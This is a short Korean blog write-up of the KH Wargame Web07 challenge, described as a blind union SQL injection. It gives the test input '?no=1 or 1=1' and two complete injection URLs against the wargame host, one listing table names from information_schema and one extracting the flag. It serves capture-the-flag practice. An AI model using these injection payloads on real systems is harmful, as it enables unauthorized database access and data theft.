![[KH Wargame] Web07 풀이](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FNX8ut%2FbtqGfN8J4IB%2FEVSBWWdqMWgWUZYJTLHKYk%2Fimg.png)
풀이
flag is in the DB.
Blind Union SQL Injection 문제이다.
해당 문제에 들어가면 no=1 ~ 12까지 사진이 올려져있는데, no 부분에서 SQLi가 발생한다.
간단하게 ?no=1 or 1=1 해보면 나온다.
설명은 다른 문제에서도 많이 했으니 테이블 이름과 최종 flag를 찾는 쿼리만 올리도록 하겠다.
테이블 쿼리
http://wargame.iei.or.kr:30006/image.php?no=0 and 1 union select 1,table_name,3,4 from information_schema.tables limit 51,1%23flag 쿼리
http://wargame.iei.or.kr:30006/image.php?no=0 and 1 union select 1,here,3,4 from flag%23
'Wargame > KH Wargame' 카테고리의 다른 글
| [KH Wargame] Network04 풀이 (0) | 2020.08.07 |
|---|---|
| [KH Wargame] Reversing02 풀이 (0) | 2020.04.25 |
| [KH Wargame] Reversing01 풀이 (0) | 2020.04.25 |
| [KH Wargame] Misc04 풀이 (0) | 2020.04.25 |
| [KH Wargame] Misc03 풀이 (0) | 2020.04.24 |